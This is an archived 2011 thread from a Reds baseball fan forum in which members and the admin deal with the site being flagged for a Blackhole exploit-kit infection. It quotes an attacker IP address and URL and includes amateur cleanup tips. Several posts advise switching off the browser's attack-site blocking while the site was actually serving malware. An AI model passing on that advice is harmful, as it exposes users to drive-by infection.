PDA

View Full Version : RedsZone Malware Attack Discussion



jojo
05-15-2011, 06:12 PM
I'm a firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

RBA
05-15-2011, 06:16 PM
I'm a firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

It's happening to me. I had to use IE to respond to this post.

HalMorrisRules
05-15-2011, 06:22 PM
I'm a firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

Yes, my guess would be that bitter Card fans have reacted in some childish way resulting in RZ being flagged.

top6
05-15-2011, 06:22 PM
It's happening to me. I had to use IE to respond to this post.

Exact same thing just happened to me, and I did the exact same thing.

It happened very recently, as I posted probably an hour ago or so.

_Sir_Charles_
05-15-2011, 06:28 PM
Just now got the same thing.


Reported Attack Page!







This web page at www.redszone.com has been reported as an attack page and has been blocked based on your security preferences.





Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


Norton has this....

Web Attack: Blackhole Toolkit Website 6
Attacking Computer: 65.75.129.139, 80
Attacker URL: 65.75.129.139/Home/index.php

The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILE\INTERNET EXPLORER\IEXPLORE.EXE

pahster
05-15-2011, 06:38 PM
I'm a firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

I'm getting a warning in Chrome.

Boss-Hog
05-15-2011, 06:39 PM
Yes, my guess would be that bitter Card fans have reacted in some childish way resulting in RZ being flagged.
That's my guess...I have reported the problem to our host. I will keep you posted as soon as I hear anything.

foxfire123
05-15-2011, 06:42 PM
Anyone else getting Google Attack site warnings when they try to read RedsZone? I've been getting them for the past half hour or so. Tried to PM Boss Hog to ask about it but the pop ups are stopping any messages. Or at least it looks like it, Boss may have gotten 2 messages and they're just not showing in my PM Sent folder. Had a non member friend try and load the site, and he's getting the same message. both of us use Firefox.

I turned off my "block attack sites" security setting, hopefully it lets me post this this time. this is the second attempt at posting a new topic. I'm running Comodo also to make sure nothings infected, but I think it's more a nuisance reporting of the site than anything actually wrong.

PMand JM
05-15-2011, 06:43 PM
just started getting them in the past 30 min

Brutus
05-15-2011, 06:44 PM
I too am getting a malware warning from Chrome when I visit. And if the context helps... the warnings began almost immediately after getting some server error messages about an hour ago, which was prohibiting the site from loading and instead giving query errors.

BigJohn
05-15-2011, 06:45 PM
I only get it when using mozilla, not internet explorer.

Vottomatic
05-15-2011, 06:46 PM
I use Explorer and I'm not getting them.

jimbo
05-15-2011, 06:46 PM
I started getting them also. I'm also using firefox and turned off the "block attack sites" setting and am accessing the site fine now.

BigJohn
05-15-2011, 06:47 PM
Better stay off the porn sites then, LOL!!!:lol:

OesterPoster
05-15-2011, 06:48 PM
I bet Chris Carpenter's son did it.

Actually, the first attack message I got was at exactly 6:30. I had clicked through 3 pages of the Cordero vs. Cards thread, and got the error when clicking onto the 4th page.

foxfire123
05-15-2011, 06:50 PM
I started getting them also. I'm also using firefox and turned off the "block attack sites" setting and am accessing the site fine now.

Yeah, I'm ok now that I turned of the block, but I'm not comfortable LEAVING it turned off.

I'm sure now that Boss and the other admin folks know, they'll check into it.

CrackerJack
05-15-2011, 06:55 PM
Getting a malware warning in Chrome also here.

Stray
05-15-2011, 07:04 PM
Yep I just started getting them. Turned off the option to block them but like foxfire, I don't really wanna leave it off.

I wonder who reported this as a sketchy site lol.

RedsMan3203
05-15-2011, 07:10 PM
Just got a Malware warning from Google Chrome....

mikdavrut
05-15-2011, 07:10 PM
I left my comp. running yesterday (Sat.) about 30 min. prior to the ballgame (I left to watch the game w/a friend) and Redszone was the only page I was on (running iexplorer). When I came home from the game, it was sometime close to 7 or maybe even a bit after 7. Well my comp. was ALL messed up. I kept getting popups saying that I was having "critical HD failure. ALL my files disappeared (as though the HD had crashed) but oddly enough, I could still browse the net. So I KNEW it had to be some kind of malware. The following would popup about every 25 seconds (close it out, it would continuously pop back up every 25 sec. or so): "system detected problems with one or more installed IDE/SATA hard disks"

And some supposed "scanner" stayed popped up (couldn't minimize nor x it out, could only "move it" to the bottom of my screen so I could see). It kept "appearing" to "scan" my system and found 5 "critical failures" with my HD, and it supposedly "fixed" 6. *ETA - it kept wanting me to "buy" the "advanced" version which would "fix" the "critical failures" that this basic vs. of the scanner could not fix - ie - it just wanted my CC info, so if anyone else out there happens to become infected w/this or anything remotely like it - DO NOT GIVE OUT YOUR CC INFO!!!! I'm sure most of you are smart enough to already know this but just in case!! - end of edit*

So I did some googling and typed into google that "system detected problems" msg. I kept getting and sure enough, it was malware. So I had to run a "kill" prog. to kill off the scanner and the several annoying "system failure" msgs. I kept having popping up. That got rid of that annoying crap. Then I ran Malwarebytes and it found I think 4 infections, and I deleted those. Downloaded "Hijack This" and did a scan but I don't understand what it "finds" and I'm afraid to take any action until someone can look at the log it gave me and let me know what's bad and what's not (cause I KNOW I still have nasties in my system - every now and again I'll hear advertisements when the page I'm on, which has been this one for the last hour or so does not appear to have any "running ads" only static ones. There's also 2 iexplorer.exe running in my task mgr. when I only have one running - so there's DEF. still some problems in my system, but luckily I got rid of the worst of it and I can use my comp. quite normally for now - but I GOT to get these nasties off of my system).

Oh yeah, after using the Mbytes and deleting what it found, I had to use unhide.exe to get my files to "show back up" (this malware prog. makes all your files appear to be "gone" so you think your HD has totally screwed up).

I don't KNOW that I got anything from Redszone and I'm not saying that I did, but it was the ONLY page I left up when I left to go watch the game and when I came back, that crap immediately started, and now you guys are getting some odd msg.? I don't know. It's something that it sure wouldn't hurt to look into. I have NEVER had anything like what I had infect my system last night, man, it was a NASTY infection. In Google searches, it seems to (whatever it was that I had) be REALLY going around right now though as most of the searches that showed up for me were from like March and on from this year. I think some ppl. have gotten it after visiting MySpace pages while others say they got it after visiting Facebook, etc. etc. So like I said, I'm not saying I got it from here, just that it's something that might be worth looking into if others are getting a "threat" type msg.

Chris Sabowned
05-15-2011, 07:16 PM
I just go them too. Kinda sketchy.

jwittenmyer
05-15-2011, 07:23 PM
Seeing it too. It's from an infected ad that's running on the site. The ad is probably in rotation so you won't see it all the time. However, the site has been flagged by Google as a source of malware. That's why you're getting the warning from Chrome and Firefox. The site admins need to figure out which ad it is and contact their ad provider to have it removed.

paintmered
05-15-2011, 07:29 PM
Ditto on the malware warning for me too.

Boss-Hog
05-15-2011, 07:54 PM
My host has responded and has asked for permission to run a full malware scan, which I gave approval. I will keep you posted as soon as they reply back.

SirFelixCat
05-15-2011, 08:09 PM
Boss, please remove all ads until it's determined which is causing said malware detection.


Thanks.

kaldaniels
05-15-2011, 08:34 PM
In all seriousness are we thinking Card fans did this?

Boss-Hog
05-15-2011, 08:44 PM
In all seriousness are we thinking Card fans did this?
Unknown at this point...it's certainly possible or it could be a "false positive".

Boss-Hog
05-15-2011, 08:50 PM
Boss, please remove all ads until it's determined which is causing said malware detection.


Thanks.
Good suggestion - I just tried that and confirmed it's not the ads, as I receive the same message with ads disabled.

RedsManRick
05-15-2011, 09:52 PM
Could somebody have made a post with an offending URL? Maybe you can take a look at posts made by new users or with few posts?

Joseph
05-15-2011, 10:07 PM
Thats a strong possibility Rick, as is any photo posted.

Boss-Hog
05-15-2011, 10:13 PM
Could somebody have made a post with an offending URL? Maybe you can take a look at posts made by new users or with few posts?

Possibly, but that shouldn't knock out the entire site, right? Our host is running the malware scan now and will let us know the results once it's complete.

jhiller21
05-15-2011, 10:34 PM
I'm guessing some cards fan reported the site. If that's the case, real classy...

mikdavrut
05-16-2011, 12:15 AM
I posted what happened to my computer after leaving Redszone up & running for about 4 - 5 hours in the SunDeck forum. NO CLUE if it actually happened due to Redszone, but I spent 4 - 5 hours last night getting rid of a bunch of malware, then today noticed that I had a "redirect" trojan/virus/whatever (in other words when doing any search engine searches, when I would click on the results, I would immediately be redirected to a fake page). Took me FOREVER to get rid of it (finally got rid of it about 30 min. ago, if that and started trying around 6 this evening). Finally found a program called Hitman Pro that did the trick the SECOND time I did a scan w/it (I think I made a mistake while deleting the stuff that it found after the first scan). I tried everything minus the kitchen sink (prog. after prog. after prog.) and though they ALL found crap like cookies and non-major threats, the 2nd scan with the Hman FINALLY appears to have found the offender (crossing my fingers).

Like I said, I'm not blaming Redszone, but it IS weird that I got this infection somewhere between the start of Sat. game and the games conclusion and this is the site I was on (and left on) while I was away watching the game, and it appears that between that same time period and throughout Sunday, all these users are getting these "attack" notifications/warnings. Factually, all I know is that Pre-game Sat., no computer/internet problems....post game, TONS of problems, malware up the butt. And HOURS of work getting rid of everything (IF I even HAVE gotten rid of everything, I sure am hoping - at least I appear to have gotten rid of the worst of it).

Boss-Hog, I'll be really interested in what you find out after your host does/completes their malware scan. Everyone else, just be cautious and if anyone DOES end up having problems and you need some help, PM me, I check RZ daily and believe me, I learned a TON while trying a TON of things getting my crap back to normal, so maybe I can save you a ton of time. Hopefully noone else will have any problems though!

CrackerJack
05-16-2011, 12:39 AM
I'm having no problems with any sort of warnings for malware from Avast. Someone either hacked the site and inserted code with a false positive, or someone clicked on a bad ad and reported, or their browser reported, that it was infected as a result of clicking the link or downloading something.

Sounds like it is not a big deal, just a warning that needs to be removed.


Google's results help shed some light on it I think:




The Google

Diagnostic page for redszone.com

What is the current listing status for redszone.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 7 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-05-15, and the last time suspicious content was found on this site was on 2011-05-15.
Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including 65.75.129.0/.

This site was hosted on 1 network(s) including AS40244 (TURNKEY).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, redszone.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of

mikdavrut
05-16-2011, 01:05 AM
I'm having no problems with any sort of warnings for malware from Avast. Someone either hacked the site and inserted code with a false positive, or someone clicked on a bad ad and reported, or their browser reported, that it was infected as a result of clicking the link or downloading something.

Sounds like it is not a big deal, just a warning that needs to be removed.


Google's results help shed some light on it I think:

If it's just a false warning, then it must just be a complete coincidence that this site had anything at all to do with the problems I experienced, I just thought the timing was odd, seeing as I "appeared" to have become infected sometime during the Reds/Cards game Sat. and between that time and Sun. seems to be when users of this site began experiencing the "warnings".

Let me add that I am one of those morons that always lets their antivirus expire and then basically runs their computer unprotected. I have purchased 4 new computers since 2006, done the same with all of said computers and have NEVER had any infections, etc. (just getting rid of tracking cookies, etc. via running ad-aware or programs of that ilk). Yesterdays malware infection was my first time experiencing such a thing. So I could have picked it up somewhere else and it just chose to "show itself" after the game yesterday.

So yeah, this site may very well have nothing wrong with it at all, I just wanted to report the problems I experienced after reading that others were getting the warnings. As I mentioned in a previous post on the matter, this particular form of malware seems to be going around like hotfire in the past 3 - 5 months or so.

CrackerJack
05-16-2011, 01:30 AM
If it's just a false warning, then it must just be a complete coincidence that this site had anything at all to do with the problems I experienced, I just thought the timing was odd, seeing as I "appeared" to have become infected sometime during the Reds/Cards game Sat. and between that time and Sun. seems to be when users of this site began experiencing the "warnings".

Let me add that I am one of those morons that always lets their antivirus expire and then basically runs their computer unprotected. I have purchased 4 new computers since 2006, done the same with all of said computers and have NEVER had any infections, etc. (just getting rid of tracking cookies, etc. via running ad-aware or programs of that ilk). Yesterdays malware infection was my first time experiencing such a thing. So I could have picked it up somewhere else and it just chose to "show itself" after the game yesterday.

So yeah, this site may very well have nothing wrong with it at all, I just wanted to report the problems I experienced after reading that others were getting the warnings. As I mentioned in a previous post on the matter, this particular form of malware seems to be going around like hotfire in the past 3 - 5 months or so.

If your PC had a virus/malware while you were on or posting on RZ, then it's possible it was detected, certain browsers picked it up (RZ uses Google ads, Chrome is clearly showing a warning message), so yeah probably something pretty minor. Awful sensitive security measures from Google or the host or someone though, not sure. Did you click on any of the Google ads, either by accident or not?

I don't think your original post accused RZ of anything, always good to bring that kind of thing to their attention (your PC was clearly infected at the time).

mikdavrut
05-16-2011, 02:03 AM
If your PC had a virus/malware while you were on or posting on RZ, then it's possible it was detected, certain browsers picked it up (RZ uses Google ads, Chrome is clearly showing a warning message), so yeah probably something pretty minor. Awful sensitive security measures from Google or the host or someone though, not sure. Did you click on any of the Google ads, either by accident or not?

I don't think your original post accused RZ of anything, always good to bring that kind of thing to their attention (your PC was clearly infected at the time).

To be fair, Fri. night/early AM Sat., I DID visit a MySpace site and I remember back when I used to actually use MySpace I had a few minor problems with some prog. "appearing" to be doing a "scan" and finding "problems" - though it never appeared to have ever infected my computers or anything. But, when I visited that MS site, that was the 1st time I had been on MS in a LONG time (I long ago gave up on/quit using MS as I just think it completely went down the crapper with all the changes they made in the last yr. or two, plus Fbook is just so much better for that kind of thing). I just happened to remember that I had visited that MS page very briefly so it's VERY possibly I picked it up from there. The only other site I visited previous to that happening was my Facebook profile, and though I don't think it's likely, it COULD have been picked up there as well. I HAVE read of others complaining about picking up malware via Facebook as of late.

So yeah, I def. was not blaming Redszone as I actually thought it was very unlikely that I would pick up malware from here, but I DID think it was kind of ironic that other users began getting those warning msgs. at that very same range in time.

And no, I'm nearly positive that I did NOT click on any of the ads on this site, if I did do so, it was by complete accident and I didn't notice doing so.

Oh well, hopefully I finally got rid of all the offenders on my PC and this whole mess is over with for me. I do look forward to reading what Boss-Hog gets reported back to him concerning the site hosts malware scan. Hopefully it is indeed nothing.

The ONLY problem I have personally ever experienced w/RedsZone is it does tend to go VERY slowly quite often as of late (not sure why, this just started within the past month or two for me personally, main problem being that it made it very difficult to participate in a timely manner to "game threads" - by the time I could get my post up, the play was long over and my reply was about as worthless as could be :laugh: ).

Oh well, like you said, it's prob. absolutely nothing ado w/this site and I most almost assuredly already infected.

jojo
05-16-2011, 02:05 AM
The ONLY problem I have personally ever experienced w/RedsZone is it does tend to go VERY slowly quite often as of late (not sure why, this just started within the past month or two for me personally, main problem being that it made it very difficult to participate in a timely manner to "game threads" - by the time I could get my post up, the play was long over and my reply was about as worthless as could be :laugh: ).

That couldn't have happened to you more than maybe.... twice?

mikdavrut
05-16-2011, 02:09 AM
That couldn't have happened to you more than maybe.... twice?Well, no (I think you're judging by my post count) - I have posted on this site more than what my post count appears to show. I have no clue why I'm just showing to have like 5 or 6 posts? I'm thinking that when you make a post in a "game thread" it does not count towards your post count (at least, any and every post I have made in any game threads have NOT added to my post count).

But, to be fair to what you are saying, I have not posted often in game threads. I was going to start, but the problems with the lag during the last game thread I attempted to participate in were so bad, I just gave up. My last attempt to post in a game thread was prob. a month or so ago. I now forget which series it was.

Maybe I will try again soon as, in the past week or so, RZ seems to be running more smoothly for me.

*ETA - I've also noticed that posts to this forum also do not count towards post count, or at least have not been for me, so I'm assuming that is correct. *

Ron Madden
05-16-2011, 06:50 AM
I had problems with the site yesterday, I logged off of RedsZone then logged back in and it seems to have helped.

Boss-Hog
05-16-2011, 07:25 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.

Reds
05-16-2011, 07:38 AM
Thanks for the update.

Reds
05-16-2011, 07:47 AM
I also want to post how to turn this warning system off for Firefox. Please note that doing this will disable malicious warnings for every website and not just redzone.com.

Go to Tools > Options > Security > Uncheck 'block reported attack sites' > OK

mikdavrut
05-16-2011, 08:02 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.

Boss-Hog, was it at all possible that the malware my computer became infected with could have possibly came from Redszone? I'm just curious (not upset about it or anything like that, I'm just trying to pinpoint exactly where I DID get infected more than anything else). You mentioned there was one problematic file found, so I'm just curious as to if it WAS at least possible or not? My main suspect is a MySpace page I viewed sometime around 1 - 2AM Sat. morning. But if it WAS that page, I'm curious as to why the infection did not show up until sometime around 6 or 7PM Sat. evening.

Like I said, just trying to narrow the possibilities down.

Thanks a lot and I hope everything gets easily resolved for you!

Boss-Hog
05-16-2011, 08:29 AM
Boss-Hog, was it at all possible that the malware my computer became infected with could have possibly came from Redszone? I'm just curious (not upset about it or anything like that, I'm just trying to pinpoint exactly where I DID get infected more than anything else). You mentioned there was one problematic file found, so I'm just curious as to if it WAS at least possible or not? My main suspect is a MySpace page I viewed sometime around 1 - 2AM Sat. morning. But if it WAS that page, I'm curious as to why the infection did not show up until sometime around 6 or 7PM Sat. evening.

Like I said, just trying to narrow the possibilities down.

Thanks a lot and I hope everything gets easily resolved for you!
This is not really my area of expertise, but yeah, I suppose it's possible - particularly if your virus updates were out of date, as you mentioned. I'm not positive from your posts, but if it occurred on Saturday, then I'm pretty confident that it did not come from RZ since no one was aware of any related problems until yesterday (Sunday) afternoon; if it occurred yesterday, then it is definitely possible. If the latter, I'm not saying 100% for sure that's what caused the problem, but as best I can tell, it's possible, though I've not heard of anyone else that has been infected by this. Others that are more knowledgeable in this area can probably better assist you, though.

Mario-Rijo
05-16-2011, 11:25 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.

I'll be waiting patiently, err I'll try to wait patiently. Until then I will use IE for RZ alone.

KittyDuran
05-16-2011, 11:35 AM
I'll be waiting patiently, err I'll try to wait patiently. Until then I will use IE for RZ alone.

Well it attacked my computer here at work... and my boss is still working on it... :(

Boss-Hog
05-16-2011, 11:42 AM
My host confirmed that it's an attack they've seen before with this version of vBulletin. While it's not the latest and greatest, 3.8.7 that we're running is the latest 3.X version and we have all patches and so forth installed. We'd been reluctant to upgrade to 4.X until we're able to confirm that all our custom code/enhancements is ported over to 4.X. I have followed up with vBulletin to figure out 1). how to address the problem if the steps I've taken above have not already done so after Google reviews the site and 2). what we need to do to prevent this from ever happening again. Thanks again for your patience...in light of Kitty's post above this one, I'd definitely say visit with extreme caution (if you must) until I confirm we're 100% good to go.

powersackers
05-16-2011, 02:05 PM
These troans are a terrible fact of web browsing these days. Most are a painful yet quick fix.

1) Have a copy of Rkill.exe (available on the net) and MalwareBytes or HiJackThis installed on your PC or a USB drive
2) As soon as you get the pop ups / scanners / alerts shut down your PC with the start>shutdown or power off button
3) Boot into safe mode, put rkill.exe into C:\Users\your username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs - You have to enable viewing of hidden folders and files to see this location in explorer
4) Reboot into normal windows
5) Run the MalwareBytes or HiJackThis program allowing it to update itself first.
6) Remove Rkill.exe from that folder, keeping it somewhere safe for next time

You'll be back to normal.

LoganBuck
05-16-2011, 02:14 PM
Malware attack message no longer showing up for me. I am running Firefox 4

cinreds21
05-16-2011, 02:19 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Same here. I'm on Chrome.

Boss-Hog
05-16-2011, 03:11 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Good to hear...that MAY mean Google analyzed the site and it's no longer currently a threat. I'll be able to confirm when I get home.

_Sir_Charles_
05-16-2011, 04:04 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Same here. Looks good to go Boss. :clap:

Boss-Hog
05-16-2011, 05:10 PM
From Google:


Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate.

Now I have to do my part to ensure something like this never happens again. Unfortunately, I'm 95% sure the problem was not something on our end that is easy to fix, and if I'm right, there's going to be a good amount of work for us to make sure this is the first and only attack of its kind. Thanks again for everyone's patience.

KittyDuran
05-16-2011, 06:27 PM
Well it attacked my computer here at work... and my boss is still working on it... :(

My boss worked as much as he could with it but in the end he just went and purchased a new HD since mine was about 6 years old.

jojo
05-16-2011, 06:34 PM
My boss worked as much as he could with it but in the end he just went and purchased a new HD since mine was about 6 years old.

Just as a tip, download malwarebytes (free) and keep it updated. Between it and a good virus program (I use sopphos), you guys should be mostly covered. If you do get a nasty malware program, just go into safe mode and run malwarebytes and it will usually fix your problem in about 5 minutes...

Boss-Hog
05-16-2011, 07:02 PM
Just as a tip, download malwarebytes (free) and keep it updated. Between it and a good virus program (I use sopphos), you guys should be mostly covered. If you do get a nasty malware program, just go into safe mode and run malwarebytes and it will usually fix your problem in about 5 minutes...

I second this advice (though I use Avast as my antivirus software).

MikeThierry
05-16-2011, 10:11 PM
Does anyone have any idea how this malware attack happened?

KronoRed
05-16-2011, 10:28 PM
Does anyone have any idea how this malware attack happened?

Get ready for some paranoid blame to be thrown your way ;)

Tony Cloninger
05-16-2011, 10:56 PM
I was at my parents. I was browsing the site and on accident clicked an advertisement......and then it was like a mess. Virus this and that. Computer wiped out all my parents info.

Here I am....a 40 year old man getting yelled at by his parents...."BUT it wasn't porno that I was looking at, Mom!"

I have an Apple and they warn you NOT to go into this site...less you be infected by a Malware Attack.

Screwball
05-16-2011, 11:56 PM
Get ready for some paranoid blame to be thrown your way ;)

I have no idea if a Cardinals fan attacked the site or not, but I don't think it's unreasonable to suspect that it was. In fact I'd say that's more being logical than paranoid.

MikeThierry
05-17-2011, 03:32 AM
I have no idea if a Cardinals fan attacked the site or not, but I don't think it's unreasonable to suspect that it was. In fact I'd say that's more being logical than paranoid.

Its not unreasonable yet at the same time to jump to conclusions about it would be folly as well. I have been a member of other forums in the past that have had malware attacks simply because it is a hacker at the other end just playing a game. This is a rather popular forum so it could be any number of people.

Boss-Hog
05-17-2011, 06:40 AM
Its not unreasonable yet at the same time to jump to conclusions about it would be folly as well. I have been a member of other forums in the past that have had malware attacks simply because it is a hacker at the other end just playing a game. This is a rather popular forum so it could be any number of people.
That's all true but without getting into details, what I do know at this point is that if something was secured properly (outside of our control), this all is a non-issue.

Mario-Rijo
05-17-2011, 08:38 AM
Well it attacked my computer here at work... and my boss is still working on it... :(

Ouch, that's no good. Sorry to hear it. My Boss would likely have a major meltdown, we are very big on security and we aren't supposed to be surfing.

KittyDuran
05-17-2011, 09:42 AM
Ouch, that's no good. Sorry to hear it. My Boss would likely have a major meltdown, we are very big on security and we aren't supposed to be surfing.

It wasn't a problem since I was surfing on Saturday before going to the game... And I sent him an email from my IPhone right then so he would have a heads-up.

Boss-Hog
05-17-2011, 11:23 AM
It wasn't a problem since I was surfing on Saturday before going to the game... And I sent him an email from my IPhone right then so he would have a heads-up.
So it sounds like this happened on Saturday? If so, I'm not positive the attack was from this site - not say it couldn't be, but everything I've seen indicated Sunday or later would've been the days to cause a potential infection. Regardless of whether it was due to this site or not, I'm sorry to hear about it, Kitty.

smith288
05-17-2011, 03:19 PM
DONT USE IE. Especially the older versions. Horrible horrible browser.

smith288
05-17-2011, 03:20 PM
I was at my parents. I was browsing the site and on accident clicked an advertisement......and then it was like a mess. Virus this and that. Computer wiped out all my parents info.

Here I am....a 40 year old man getting yelled at by his parents...."BUT it wasn't porno that I was looking at, Mom!"

I have an Apple and they warn you NOT to go into this site...less you be infected by a Malware Attack.
If you have an Apple, how did you get malware installed?

Boss-Hog
05-17-2011, 04:43 PM
If you have an Apple, how did you get malware installed?
I think he's saying he has an Apple, but he was at his parents when it happened and they presumably do not have an Apple.

Tony Cloninger
05-17-2011, 04:45 PM
If you have an Apple, how did you get malware installed?

Parents do not have an Apple......they have a computer that gets more viruses than the Middle Ages and always seems to have a problem with anything.

mikdavrut
05-18-2011, 12:22 AM
So it sounds like this happened on Saturday? If so, I'm not positive the attack was from this site - not say it couldn't be, but everything I've seen indicated Sunday or later would've been the days to cause a potential infection. Regardless of whether it was due to this site or not, I'm sorry to hear about it, Kitty.
It happened to me on Sat. as well. Like I mentioned, I left my browser open, computer running & was on this site, then left for a friends house to watch the game and when I came back home, it got NASTY. Sounds like this other person got infected close to game time as well just like I did? I'm pretty sure the attack/malware definitely came from this site and happened on Sat. Might not have gotten the warnings until Sunday, but the attacks seem to have actually taken place/started right before/around/during gametime on Sat.

Hopefully everything is good now. That was one NASTY piece of malware even doing all of the Rkills/Malwarebytes/etc, it finally took 2 uses of Hitman Pro to get rid of the google-redirect (redirects ALL search engine hits to fake sites unless you use the "cache" option which was the only way I could search the web and figure out exactly how to get rid of all of this crap).

Oh yeah, to the person who says their parents comp. is completely wiped out, it's NOT. You need to get rid of the malware and use unhide.exe. It made ALL my files disappear as well as my desktop icons...everything. This particular malware hides all of your files so that it will appear as though your HD has failed. Those files are still there (just "hidden" by the malware), so hopefully your parents haven't gone out and paid for a new computer or anything like that.

Boss-Hog
05-18-2011, 06:48 AM
If the attack did indeed come from this site, which is definitely possible, I sincerely apologize, even though I've confirmed it was through no fault of our own (meaning GIK and I). I should mention that there were plenty of others that visited the same during the same time period (including myself, against my better judgement, in order to try to fix the problem) and were not infected. In the above poster's case, not keeping your antivirus and anti-malware programs up to date and running regular scans makes you much more susceptible to a situation like this - whether that be on RedsZone or anywhere else on the internet. Again, I'm not saying this is in any way your fault, but that would be my take away from this experience.

Mario-Rijo
05-18-2011, 09:24 AM
So Boss as far as you can tell was it an infection here or just a false alarm? I can't figure out if I need to take any steps here. I don't appear to be having any problems just had that darn message continuously pop up everytime I clicked on a link here.

mikdavrut
05-18-2011, 09:33 AM
If the attack did indeed come from this site, which is definitely possible, I sincerely apologize, even though I've confirmed it was through no fault of our own (meaning GIK and I). I should mention that there were plenty of others that visited the same during the same time period (including myself, against my better judgement, in order to try to fix the problem) and were not infected. In the above poster's case, not keeping your antivirus and anti-malware programs up to date and running regular scans makes you much more susceptible to a situation like this - whether that be on RedsZone or anywhere else on the internet. Again, I'm not saying this is in any way your fault, but that would be my take away from this experience.Boss-Hog, please don't think in ANY way whatsoever that I blame you or RedsZone for this...it isn't your guys fault whatsoever. It's just one of those things that happens. And yes, me not keeping my antivirus, etc. up-to-date and running made me EXTREMELY susceptible. I was actually thinking I might not have gotten it from RZ, but 3 ppl. who all seemed to become infected the same day/around the same time makes me almost 100% certain that it came from here. I think it's just too much of a coincidence to think otherwise.

But once again, it's NOT your fault and I'm NOT upset w/you or w/Redszone....nothing like that at all. So no need for you to apologize about it Boss! :beerme:

Alls well that ends well, and thus far, it appears as though, if I have not gotten it 100% entirely, I've gotten rid of most of it and most everything that it disrupted on my computer. I have Thursday off, so I'm going to take some time Thursday night and go through my computer quite intensely, making sure that I either have it 100% done away with or that I get whatever aspects might possibly be left of it.

One thing I am no longer going to do is leave my computer running 24/7. Up until this happened, I NEVER shut my computer off (only when going away on vacation, etc. where I would be away for like a week or better), but otherwise, my computer ran all the time. Now, anytime I leave or am going to be away from it for a while, I go ahead and shut it down. I've really narrowed out a lot of programs I had that were set to "start up @ start up" which could make starting my computer up seemingly take FOREVER, but now, I only have like one prog. the starts @ start up, so it takes no-time for my computer to boot up now which makes shutting it down/rebooting up no big deal now.

I hope the guy that said all of his parents files got wiped out reads this thread and tries the unhide.exe prog. - I would hate to see his parents "lose" their files, thinking they're gone when the malware has simply "hidden" them. I've had a HD crash before and lost hundreds and hundreds of files and I darn well KNOW what a total pain in the butt that is. It can be a damn near nightmare to be honest, depending upon how many/what type of files you have. Kinda makes a person give serious thought to signing up for one of those "Carbonite" type programs! They're pretty inexpensive and if a HD DOES actually fail, they have all of your files backed up for you! I very well might go ahead and sign up for one of those services, I just think it would be worth every penny!!!

Oh yeah Boss, thanks for keeping us all updated on this as well!

Take Care man!

Boss-Hog
05-18-2011, 11:07 AM
So Boss as far as you can tell was it an infection here or just a false alarm? I can't figure out if I need to take any steps here. I don't appear to be having any problems just had that darn message continuously pop up everytime I clicked on a link here.

I think it was a legit infection and that two or three people received a malware attack would seem to confirm that. I don't think there's anything you need to do except use EXTREME caution if, God forbid, something similar were to happen again that causes the warning to appear (in Firefox and Chrome...it did not appear in IE, which is another issue altogether). Otherwise, the only other advice I have is what's already been mentioned and is good practice for anyone using the internet (not just in the situation we had): have antivirus and anti-malware scans automatically run on a frequent basis and ensure the definitions are always kept up to date.

GIK and I have some work to do that is going to take some time and goes beyond "just" this malware attack, but one of the end results of that work, once completed, is to ensure something like this never happens again.

Boss-Hog
05-18-2011, 11:08 AM
Boss-Hog, please don't think in ANY way whatsoever that I blame you or RedsZone for this...it isn't your guys fault whatsoever. It's just one of those things that happens. And yes, me not keeping my antivirus, etc. up-to-date and running made me EXTREMELY susceptible. I was actually thinking I might not have gotten it from RZ, but 3 ppl. who all seemed to become infected the same day/around the same time makes me almost 100% certain that it came from here. I think it's just too much of a coincidence to think otherwise.

But once again, it's NOT your fault and I'm NOT upset w/you or w/Redszone....nothing like that at all. So no need for you to apologize about it Boss! :beerme:

Alls well that ends well, and thus far, it appears as though, if I have not gotten it 100% entirely, I've gotten rid of most of it and most everything that it disrupted on my computer. I have Thursday off, so I'm going to take some time Thursday night and go through my computer quite intensely, making sure that I either have it 100% done away with or that I get whatever aspects might possibly be left of it.

